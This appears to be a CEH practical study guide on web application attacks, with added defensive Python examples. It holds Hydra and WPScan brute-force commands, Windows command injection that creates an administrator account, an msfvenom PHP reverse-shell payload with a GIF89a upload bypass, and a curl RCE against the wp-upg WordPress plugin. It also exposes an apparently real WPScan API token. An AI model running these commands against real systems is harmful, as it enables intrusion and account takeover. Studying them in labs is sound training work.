CEH Practical Guide
Module 14. Hacking Web Applications

2. Perform Web Application Attacks

An ethical hacker or pen tester must test their company’s web application against various attacks and other vulnerabilities.

Last updated 6 months ago

1. Brute force using Burp

Set the Burp proxy in the browser, intercept the login request, right-click it and send it to Intruder.

Now clear the default payload positions, mark the fields to attack and choose the attack type:

  • Sniper if you are only brute forcing the password.

  • Cluster bomb if brute forcing both username and password.

Set the payload type and wordlists and start the attack. A response whose length differs from the rest indicates the successful attempt.

Other brute forcing tools

# -U/-P take user and password lists (lowercase -p would be a single password); -F stops after the first valid pair
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -P /root/Documents/pass_list.txt -M ftp -F

Hydra Brute force cheatsheet

# SSH (-l single username, -P password list)
hydra -l username -P passlist.txt 192.168.0.100 ssh

# FTP (-L username list)
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100

# If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221

# TELNET (-o writes found credentials to a file)
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet

# Login form: "path:POST body with ^USER^/^PASS^ placeholders:string that marks a failed login"
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"

2. Parameter tampering using Burp

In the Proxy tab, open the Inspector panel, where each parameter's name and value are visible. Change a value, forward the request and observe how the response differs.

3. Identify XSS using PwnXss

python3 pwnxss.py -u http://testphp.vulnweb.com

4. Exploit Parameter tampering with XSS

5. Perform CSRF attacks

WPSCAN

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp

Add --random-user-agent to avoid being blocked by firewalls that filter on the default User-Agent.

6. Hack a wordpress site with WPSCAN and Metasploit

Installation

sudo apt update && sudo apt install wpscan 
wpscan --update

Enumerate WordPress users

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u 

WPScan can be used to enumerate users (u), plugins (p), themes (t) and vulnerable plugins (vp):

wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Now launch Metasploit with the database backend running

service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum

Now set the options and brute force it (TARGETURI is the base path of the WordPress install, not a full URL)

set PASS_FILE /usr/wordlist.txt
set RHOSTS 192.168.52.2
set RPORT 8080
set TARGETURI /
set USERNAME admin
run

WPSCAN brute forcing

wpscan --url http://cmnatics.playground --passwords rockyou.txt --usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

7. Remote command execution to compromise a target server

Set up DVWA and complete the DVWA guides linked in the references.

Windows Command Injection

hostname
whoami
tasklist
taskkill /PID 3112 /F     //forcefully kill the process with PID 3112
dir c:\
net user
net user test /add     //add a new user
net localgroup Administrators test /add    //add the test user to the Administrators group
net user test     //view the details of the user
dir c:\pin.txt     //check that pin.txt exists
| type c:\pin.txt     //chained after the expected input to read pin.txt
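The commands above are typed into a web form (DVWA's ping page) that hands the input to a shell. Added example, not DVWA's or the guide's code: a hypothetical Python ping handler showing the vulnerable string-concatenation pattern beside a hardened version that allow-lists the host and never invokes a shell; the function names are my own.

```python
import ipaddress
import re
import subprocess
from typing import List

# Hypothetical ping handler modelled on the DVWA "ping a host" page that the
# Windows commands above get injected into (added example, not DVWA's code).

def vulnerable_ping_command(host: str) -> str:
    """Vulnerable pattern: raw input is glued into a shell command line, so
    '127.0.0.1 | type c:\\pin.txt' makes the shell run a second command."""
    return "ping -n 1 " + host  # typically executed with shell=True

HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)

def is_valid_host(host: str) -> bool:
    """Allow-list: a literal IP address or an RFC 1123 hostname, nothing else.
    Shell metacharacters (| & ; ` $ newline) cannot pass either branch."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None

def safe_ping_argv(host: str) -> List[str]:
    """Hardened pattern: validate, then build an argv list so no shell ever
    parses the input."""
    if not is_valid_host(host):
        raise ValueError("host must be an IP address or hostname")
    return ["ping", "-n", "1", host]  # -n is the Windows count flag (-c on Linux)

def ping(host: str) -> subprocess.CompletedProcess:
    """Wire-up: with shell=False metacharacters are data, not syntax."""
    return subprocess.run(safe_ping_argv(host), shell=False,
                          capture_output=True, timeout=10)
```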

8. Exploit File upload vulnerability

Generating the payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php

Run multi/handler to catch the shell (LHOST and LPORT must match the values used in msfvenom)

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run

Check the DVWA walkthroughs in the references. For the high security level, add the following GIF header on top of the payload so it passes the image check, and save it with a .jpeg extension

GIF89a;

Now in the command prompt, rename the file

copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php 

Open the uploaded shell in the browser and you will get the Meterpreter session.
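Added example, not DVWA's or the guide's code: a server-side upload check in Python showing why the GIF89a; prefix passes a magic-bytes-only check, and how parsing the GIF structure plus a server-chosen file name and extension removes the rename-to-.php step. Function names and sample bytes are constructed for this example.

```python
import os
import secrets
import struct
from typing import Optional

def magic_only_check(data: bytes) -> bool:
    """The weak check that the GIF89a; prefix defeats: it trusts six bytes."""
    return data[:6] in (b"GIF87a", b"GIF89a")

def looks_like_gif(data: bytes) -> bool:
    """Stricter check: header, logical screen descriptor, optional global colour
    table, then a valid block introducer (0x2C image, 0x21 extension, 0x3B trailer).
    Magic bytes followed by PHP source fails this; a real GIF passes."""
    if len(data) < 13 or not magic_only_check(data):
        return False
    width, height, flags = struct.unpack("<HHB", data[6:11])
    if width == 0 or height == 0:
        return False
    pos = 13  # 6-byte header + 7-byte logical screen descriptor
    if flags & 0x80:  # global colour table present, 3 bytes per entry
        pos += 3 * (2 ** ((flags & 0x07) + 1))
    return len(data) > pos and data[pos] in (0x2C, 0x21, 0x3B)

def store_upload(client_name: str, data: bytes, upload_dir: str) -> Optional[str]:
    """Return the server-chosen path for an accepted upload, or None to reject it.
    client_name is deliberately ignored: name and extension come from the server,
    so an uploaded 'shell.jpeg' can never be turned into 'shell.php' afterwards.
    upload_dir should sit outside the web root with script execution disabled."""
    if not looks_like_gif(data) or b"<?" in data:
        return None
    return os.path.join(upload_dir, secrets.token_hex(16) + ".gif")

# Constructed samples: a minimal 1x1 GIF, and the polyglot from the lab above
# (GIF89a; followed by a PHP comment standing in for the generated payload).
VALID_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)   # header + screen descriptor
             + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)    # image descriptor
             + b"\x02\x02\x44\x01\x00\x3b")                      # LZW data + trailer
POLYGLOT = b"GIF89a;<?php /* payload would go here */ ?>"
```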

9. Exploit Log4j vulnerability

10. Perform Remote Code Execution (RCE) Attack

We will exploit an RCE vulnerability in a WordPress plugin.

  1. In the Terminal window, run wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token] command.

  2. The result appears, displaying detailed information regarding the target website.

  3. Scroll down to the Plugin(s) Identified section, and observe the installed vulnerable plugins (wp-upg) on the target website.

  4. In the Plugin(s) Identified section, within the context of the wp-upg plugin, an Unauthenticated Remote Code Execution (RCE) vulnerability has been detected as shown in the screenshot.

    The number of vulnerable plugins might differ when you perform this lab.

  5. In this task, we will exploit the RCE vulnerability present in the wp-upg plugin.

  6. To perform the RCE attack, run the curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL' command.

  7. This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the admin-ajax.php file, allowing an attacker to execute arbitrary system commands via the exec function, potentially leading to remote code execution.

  8. In the last step, the whoami command was executed, yielding the outcome nt authority\system.
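From the defender's side, both the login brute force in section 1 and the wp-upg admin-ajax.php request in step 6 leave a clear trace in the web server access log. Added example, not from the guide: a Python detector for both, run over constructed log lines with placeholder IPs; the login path, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def parse(line):
    m = LOG_RE.match(line)  # one access-log line -> dict, or None if unparsable
    if not m: return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["size"] = 0 if d["size"] == "-" else int(d["size"])
    return d

def login_bursts(lines, login_path, threshold=10, window=timedelta(seconds=60)):
    """IPs with more than `threshold` POSTs to login_path inside `window`, mapped to the
    response sizes seen: one odd size among identical ones is the 'different length' tell."""
    by_ip = defaultdict(list)
    for d in filter(None, map(parse, lines)):
        if d["method"] == "POST" and d["path"].split("?")[0] == login_path:
            by_ip[d["ip"]].append(d)
    hits = {}
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(reqs):  # sliding window starting at each request
            if sum(1 for r in reqs[i:] if r["ts"] - first["ts"] <= window) > threshold:
                hits[ip] = sorted({r["size"] for r in reqs})
                break
    return hits

# Signature for the wp-upg admin-ajax.php request shown in step 6 above.
UPG_RCE_RE = re.compile(r"admin-ajax\.php\?.*action=upg_datatable.*field=[^&]*:exec:", re.I)

def wp_upg_rce_hits(lines):
    return [(d["ip"], d["path"]) for d in filter(None, map(parse, lines))
            if UPG_RCE_RE.search(d["path"])]  # (ip, path) per matching request

# Constructed sample log (placeholder IPs): a 13-request login burst, one wp-upg exec request, one page view.
def _line(ip, ts, method, path, status, size):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size}'

SAMPLE = [_line("203.0.113.7", f"05/Mar/2024:10:00:{i:02d} +0000", "POST", "/department/login.php", 200, 1432) for i in range(12)]
SAMPLE += [
    _line("203.0.113.7", "05/Mar/2024:10:00:13 +0000", "POST", "/department/login.php", 302, 221),
    _line("198.51.100.9", "05/Mar/2024:10:05:00 +0000", "GET", "/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL", 200, 55),
    _line("192.0.2.4", "05/Mar/2024:10:06:00 +0000", "GET", "/index.php", 200, 5120),
]
```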

Reference

  • Brute Force Password Cracking with Medusa (Medium)
  • Medusa
  • GitHub - pwn0sec/PwnXSS: PwnXSS: Vulnerability (XSS) scanner exploit (GitHub)
  • TryHackMe | Cyber Security Training (TryHackMe)
  • DVWA Walkthrough Step by Step - CavemenTech - Demystifying Technology (CavemenTech)
  • DVWA Ultimate Guide - First Steps and Walkthrough - Bug Hacking (Bug Hacking)
  • Certified Ethical Hacker (CEHv12) Practical hands on Labs (Udemy)